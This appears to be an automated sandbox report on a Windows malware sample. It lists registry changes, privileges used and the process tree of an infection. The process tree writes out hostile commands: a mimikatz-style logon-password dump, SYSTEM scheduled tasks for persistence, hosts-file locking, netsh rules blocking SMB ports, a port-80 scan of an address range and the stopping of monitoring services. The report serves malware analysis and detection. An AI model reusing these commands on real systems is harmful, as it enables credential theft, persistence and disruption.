\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language hqnaebagm.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language zghnuwi.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language PING.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language rwdxsq.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language zghnuwi.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wpcap.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 3952 cmd.exe 4676 PING.EXE -
NSIS installer 3 IoCs
resource yara_rule behavioral2/files/0x0008000000023cad-6.dat nsis_installer_2 behavioral2/files/0x0007000000023cc1-14.dat nsis_installer_1 behavioral2/files/0x0007000000023cc1-14.dat nsis_installer_2 -
Modifies data under HKEY_USERS 43 IoCs
description ioc Process Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" zghnuwi.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" eqelmsiua.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" eqelmsiua.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" eqelmsiua.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump eqelmsiua.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump eqelmsiua.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" eqelmsiua.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump eqelmsiua.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" eqelmsiua.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump eqelmsiua.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump eqelmsiua.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" eqelmsiua.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump eqelmsiua.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" eqelmsiua.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ zghnuwi.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" eqelmsiua.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump eqelmsiua.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump eqelmsiua.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump eqelmsiua.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump eqelmsiua.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals eqelmsiua.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" eqelmsiua.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" eqelmsiua.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" eqelmsiua.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump eqelmsiua.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump eqelmsiua.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump eqelmsiua.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump eqelmsiua.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump eqelmsiua.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" eqelmsiua.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" eqelmsiua.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" zghnuwi.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" zghnuwi.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" eqelmsiua.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump eqelmsiua.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump eqelmsiua.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing zghnuwi.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" zghnuwi.exe Key created \REGISTRY\USER\.DEFAULT\Software eqelmsiua.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" eqelmsiua.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" eqelmsiua.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" eqelmsiua.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing eqelmsiua.exe -
Modifies registry class 14 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.cmd\ = "txtfile" zghnuwi.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.js\ = "txtfile" zghnuwi.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.vbs\ zghnuwi.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.vbe\ zghnuwi.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.VBE\ = "txtfile" zghnuwi.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.ps1\ zghnuwi.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.vbs\ = "txtfile" zghnuwi.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.reg\ = "txtfile" zghnuwi.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.bat\ zghnuwi.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.bat\ = "txtfile" zghnuwi.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.cmd\ zghnuwi.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.js\ zghnuwi.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.reg\ zghnuwi.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.ps1\ = "txtfile" zghnuwi.exe -
Runs net.exe
-
Runs ping.exe 1 TTPs 1 IoCs
pid Process 4676 PING.EXE -
Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 3888 schtasks.exe 3704 schtasks.exe 3136 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 4768 zghnuwi.exe 4768 zghnuwi.exe 4768 zghnuwi.exe 4768 zghnuwi.exe 4768 zghnuwi.exe 4768 zghnuwi.exe 4768 zghnuwi.exe 4768 zghnuwi.exe 4768 zghnuwi.exe 4768 zghnuwi.exe 4768 zghnuwi.exe 4768 zghnuwi.exe 4768 zghnuwi.exe 4768 zghnuwi.exe 4768 zghnuwi.exe 4768 zghnuwi.exe 4768 zghnuwi.exe 4768 zghnuwi.exe 4768 zghnuwi.exe 4768 zghnuwi.exe 4768 zghnuwi.exe 4768 zghnuwi.exe 4768 zghnuwi.exe 4768 zghnuwi.exe 4768 zghnuwi.exe 4768 zghnuwi.exe 4768 zghnuwi.exe 4768 zghnuwi.exe 4768 zghnuwi.exe 4768 zghnuwi.exe 4768 zghnuwi.exe 4768 zghnuwi.exe 4768 zghnuwi.exe 4768 zghnuwi.exe 4768 zghnuwi.exe 4768 zghnuwi.exe 4768 zghnuwi.exe 4768 zghnuwi.exe 4768 zghnuwi.exe 4768 zghnuwi.exe 4768 zghnuwi.exe 4768 zghnuwi.exe 4768 zghnuwi.exe 4768 zghnuwi.exe 4768 zghnuwi.exe 4768 zghnuwi.exe 4768 zghnuwi.exe 4768 zghnuwi.exe 4768 zghnuwi.exe 4768 zghnuwi.exe 4768 zghnuwi.exe 4768 zghnuwi.exe 4768 zghnuwi.exe 4768 zghnuwi.exe 4768 zghnuwi.exe 4768 zghnuwi.exe 4768 zghnuwi.exe 4768 zghnuwi.exe 4768 zghnuwi.exe 4768 zghnuwi.exe 4768 zghnuwi.exe 4768 zghnuwi.exe 4768 zghnuwi.exe 4768 zghnuwi.exe -
Suspicious behavior: LoadsDriver 15 IoCs
pid Process 656 Process not Found 656 Process not Found 656 Process not Found 656 Process not Found 656 Process not Found 656 Process not Found 656 Process not Found 656 Process not Found 656 Process not Found 656 Process not Found 656 Process not Found 656 Process not Found 656 Process not Found 656 Process not Found 656 Process not Found -
Suspicious behavior: RenamesItself 1 IoCs
pid Process 3204 2024-11-13_7f1ca571158747d3ee4cd1227849d36d_hacktools_icedid_mimikatz.exe -
Suspicious use of AdjustPrivilegeToken 23 IoCs
description pid Process Token: SeDebugPrivilege 3204 2024-11-13_7f1ca571158747d3ee4cd1227849d36d_hacktools_icedid_mimikatz.exe Token: SeDebugPrivilege 5108 zghnuwi.exe Token: SeDebugPrivilege 4768 zghnuwi.exe Token: SeDebugPrivilege 4284 vfshost.exe Token: SeDebugPrivilege 4360 eqelmsiua.exe Token: SeLockMemoryPrivilege 4028 indtey.exe Token: SeLockMemoryPrivilege 4028 indtey.exe Token: SeDebugPrivilege 1376 eqelmsiua.exe Token: SeDebugPrivilege 4948 eqelmsiua.exe Token: SeDebugPrivilege 3192 eqelmsiua.exe Token: SeDebugPrivilege 4864 eqelmsiua.exe Token: SeDebugPrivilege 440 eqelmsiua.exe Token: SeDebugPrivilege 4208 eqelmsiua.exe Token: SeDebugPrivilege 3408 eqelmsiua.exe Token: SeDebugPrivilege 4308 eqelmsiua.exe Token: SeDebugPrivilege 4884 eqelmsiua.exe Token: SeDebugPrivilege 3108 eqelmsiua.exe Token: SeDebugPrivilege 4368 eqelmsiua.exe Token: SeDebugPrivilege 3344 eqelmsiua.exe Token: SeDebugPrivilege 3960 eqelmsiua.exe Token: SeDebugPrivilege 1644 eqelmsiua.exe Token: SeDebugPrivilege 4928 eqelmsiua.exe Token: SeDebugPrivilege 1616 eqelmsiua.exe -
Suspicious use of SetWindowsHookEx 12 IoCs
pid Process 3204 2024-11-13_7f1ca571158747d3ee4cd1227849d36d_hacktools_icedid_mimikatz.exe 3204 2024-11-13_7f1ca571158747d3ee4cd1227849d36d_hacktools_icedid_mimikatz.exe 5108 zghnuwi.exe 5108 zghnuwi.exe 4768 zghnuwi.exe 4768 zghnuwi.exe 4584 xohudmc.exe 4248 rwdxsq.exe 2388 zghnuwi.exe 2388 zghnuwi.exe 3264 zghnuwi.exe 3264 zghnuwi.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3204 wrote to memory of 3952 3204 2024-11-13_7f1ca571158747d3ee4cd1227849d36d_hacktools_icedid_mimikatz.exe 86 PID 3204 wrote to memory of 3952 3204 2024-11-13_7f1ca571158747d3ee4cd1227849d36d_hacktools_icedid_mimikatz.exe 86 PID 3204 wrote to memory of 3952 3204 2024-11-13_7f1ca571158747d3ee4cd1227849d36d_hacktools_icedid_mimikatz.exe 86 PID 3952 wrote to memory of 4676 3952 cmd.exe 88 PID 3952 wrote to memory of 4676 3952 cmd.exe 88 PID 3952 wrote to memory of 4676 3952 cmd.exe 88 PID 3952 wrote to memory of 5108 3952 cmd.exe 93 PID 3952 wrote to memory of 5108 3952 cmd.exe 93 PID 3952 wrote to memory of 5108 3952 cmd.exe 93 PID 4768 wrote to memory of 448 4768 zghnuwi.exe 95 PID 4768 wrote to memory of 448 4768 zghnuwi.exe 95 PID 4768 wrote to memory of 448 4768 zghnuwi.exe 95 PID 448 wrote to memory of 4428 448 cmd.exe 97 PID 448 wrote to memory of 4428 448 cmd.exe 97 PID 448 wrote to memory of 4428 448 cmd.exe 97 PID 448 wrote to memory of 4032 448 cmd.exe 98 PID 448 wrote to memory of 4032 448 cmd.exe 98 PID 448 wrote to memory of 4032 448 cmd.exe 98 PID 448 wrote to memory of 3196 448 cmd.exe 99 PID 448 wrote to memory of 3196 448 cmd.exe 99 PID 448 wrote to memory of 3196 448 cmd.exe 99 PID 448 wrote to memory of 5116 448 cmd.exe 100 PID 448 wrote to memory of 5116 448 cmd.exe 100 PID 448 wrote to memory of 5116 448 cmd.exe 100 PID 448 wrote to memory of 2340 448 cmd.exe 101 PID 448 wrote to memory of 2340 448 cmd.exe 101 PID 448 wrote to memory of 2340 448 cmd.exe 101 PID 448 wrote to memory of 3668 448 cmd.exe 102 PID 448 wrote to memory of 3668 448 cmd.exe 102 PID 448 wrote to memory of 3668 448 cmd.exe 102 PID 4768 wrote to memory of 1748 4768 zghnuwi.exe 104 PID 4768 wrote to memory of 1748 4768 zghnuwi.exe 104 PID 4768 wrote to memory of 1748 4768 zghnuwi.exe 104 PID 4768 wrote to memory of 2296 4768 zghnuwi.exe 106 PID 4768 wrote to memory of 2296 4768 zghnuwi.exe 106 PID 4768 wrote to memory of 2296 4768 zghnuwi.exe 106 PID 4768 wrote to memory of 1612 4768 zghnuwi.exe 108 PID 4768 wrote to memory of 1612 4768 zghnuwi.exe 108 PID 4768 wrote to memory of 1612 4768 zghnuwi.exe 108 PID 4768 wrote to memory of 2284 4768 zghnuwi.exe 112 PID 4768 wrote to memory of 2284 4768 zghnuwi.exe 112 PID 4768 wrote to memory of 2284 4768 zghnuwi.exe 112 PID 2284 wrote to memory of 2236 2284 cmd.exe 114 PID 2284 wrote to memory of 2236 2284 cmd.exe 114 PID 2284 wrote to memory of 2236 2284 cmd.exe 114 PID 2236 wrote to memory of 3224 2236 wpcap.exe 115 PID 2236 wrote to memory of 3224 2236 wpcap.exe 115 PID 2236 wrote to memory of 3224 2236 wpcap.exe 115 PID 3224 wrote to memory of 3408 3224 net.exe 117 PID 3224 wrote to memory of 3408 3224 net.exe 117 PID 3224 wrote to memory of 3408 3224 net.exe 117 PID 2236 wrote to memory of 2952 2236 wpcap.exe 118 PID 2236 wrote to memory of 2952 2236 wpcap.exe 118 PID 2236 wrote to memory of 2952 2236 wpcap.exe 118 PID 2952 wrote to memory of 5068 2952 net.exe 120 PID 2952 wrote to memory of 5068 2952 net.exe 120 PID 2952 wrote to memory of 5068 2952 net.exe 120 PID 2236 wrote to memory of 2972 2236 wpcap.exe 121 PID 2236 wrote to memory of 2972 2236 wpcap.exe 121 PID 2236 wrote to memory of 2972 2236 wpcap.exe 121 PID 2972 wrote to memory of 5064 2972 net.exe 123 PID 2972 wrote to memory of 5064 2972 net.exe 123 PID 2972 wrote to memory of 5064 2972 net.exe 123 PID 2236 wrote to memory of 2388 2236 wpcap.exe 124
Processes
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵PID:2136
-
C:\Windows\TEMP\vuctsdlau\indtey.exe"C:\Windows\TEMP\vuctsdlau\indtey.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4028
-
-
C:\Users\Admin\AppData\Local\Temp\2024-11-13_7f1ca571158747d3ee4cd1227849d36d_hacktools_icedid_mimikatz.exe"C:\Users\Admin\AppData\Local\Temp\2024-11-13_7f1ca571158747d3ee4cd1227849d36d_hacktools_icedid_mimikatz.exe"1⤵
- Drops file in Windows directory
- Suspicious behavior: RenamesItself
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3204 -
C:\Windows\SysWOW64\cmd.execmd /c ping 127.0.0.1 -n 5 & Start C:\Windows\uqrutnuy\zghnuwi.exe2⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Suspicious use of WriteProcessMemory
PID:3952 -
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 53⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:4676
-
-
C:\Windows\uqrutnuy\zghnuwi.exeC:\Windows\uqrutnuy\zghnuwi.exe3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:5108
-
-
-
C:\Windows\uqrutnuy\zghnuwi.exeC:\Windows\uqrutnuy\zghnuwi.exe1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Event Triggered Execution: Image File Execution Options Injection
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4768 -
C:\Windows\SysWOW64\cmd.execmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:448 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:4428
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D users3⤵
- System Location Discovery: System Language Discovery
PID:4032
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:3196
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D administrators3⤵PID:5116
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:2340
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM3⤵
- System Location Discovery: System Language Discovery
PID:3668
-
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static del all2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:1748
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add policy name=Bastards description=FuckingBastards2⤵
- Event Triggered Execution: Netsh Helper DLL
PID:2296
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filteraction name=BastardsList action=block2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:1612
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\bliinatya\rtbnheisb\wpcap.exe /S2⤵
- Suspicious use of WriteProcessMemory
PID:2284 -
C:\Windows\bliinatya\rtbnheisb\wpcap.exeC:\Windows\bliinatya\rtbnheisb\wpcap.exe /S3⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2236 -
C:\Windows\SysWOW64\net.exenet stop "Boundary Meter"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3224 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "Boundary Meter"5⤵
- System Location Discovery: System Language Discovery
PID:3408
-
-
-
C:\Windows\SysWOW64\net.exenet stop "TrueSight Meter"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2952 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "TrueSight Meter"5⤵PID:5068
-
-
-
C:\Windows\SysWOW64\net.exenet stop npf4⤵
- Suspicious use of WriteProcessMemory
PID:2972 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop npf5⤵PID:5064
-
-
-
C:\Windows\SysWOW64\net.exenet start npf4⤵PID:2388
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf5⤵
- System Location Discovery: System Language Discovery
PID:4584
-
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net start npf2⤵
- System Location Discovery: System Language Discovery
PID:3276 -
C:\Windows\SysWOW64\net.exenet start npf3⤵
- System Location Discovery: System Language Discovery
PID:4756 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf4⤵PID:1504
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net start npf2⤵
- System Location Discovery: System Language Discovery
PID:3144 -
C:\Windows\SysWOW64\net.exenet start npf3⤵
- System Location Discovery: System Language Discovery
PID:1444 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf4⤵
- System Location Discovery: System Language Discovery
PID:2316
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\bliinatya\rtbnheisb\igadlieeu.exe -p 80 222.186.128.1-222.186.255.255 --rate=512 -oJ C:\Windows\bliinatya\rtbnheisb\Scant.txt2⤵PID:3840
-
C:\Windows\bliinatya\rtbnheisb\igadlieeu.exeC:\Windows\bliinatya\rtbnheisb\igadlieeu.exe -p 80 222.186.128.1-222.186.255.255 --rate=512 -oJ C:\Windows\bliinatya\rtbnheisb\Scant.txt3⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:1132
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\bliinatya\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit >> C:\Windows\bliinatya\Corporate\log.txt2⤵
- Drops file in Windows directory
PID:436 -
C:\Windows\bliinatya\Corporate\vfshost.exeC:\Windows\bliinatya\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4284
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "mirluebfi" /ru system /tr "cmd /c C:\Windows\ime\zghnuwi.exe"2⤵
- System Location Discovery: System Language Discovery
PID:3232 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:4684
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "mirluebfi" /ru system /tr "cmd /c C:\Windows\ime\zghnuwi.exe"3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:3888
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "glrfuunmi" /ru system /tr "cmd /c echo Y|cacls C:\Windows\uqrutnuy\zghnuwi.exe /p everyone:F"2⤵
- System Location Discovery: System Language Discovery
PID:2084 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:2736
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "glrfuunmi" /ru system /tr "cmd /c echo Y|cacls C:\Windows\uqrutnuy\zghnuwi.exe /p everyone:F"3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:3704
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "bguydwsli" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\vuctsdlau\indtey.exe /p everyone:F"2⤵
- System Location Discovery: System Language Discovery
PID:2556 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:3492
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "bguydwsli" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\vuctsdlau\indtey.exe /p everyone:F"3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:3136
-
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=TCP2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:4512
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=UDP2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:1696
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList2⤵
- Event Triggered Execution: Netsh Helper DLL
PID:4352
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=Bastards assign=y2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:3680
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=TCP2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:4792
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=UDP2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:3896
-
-
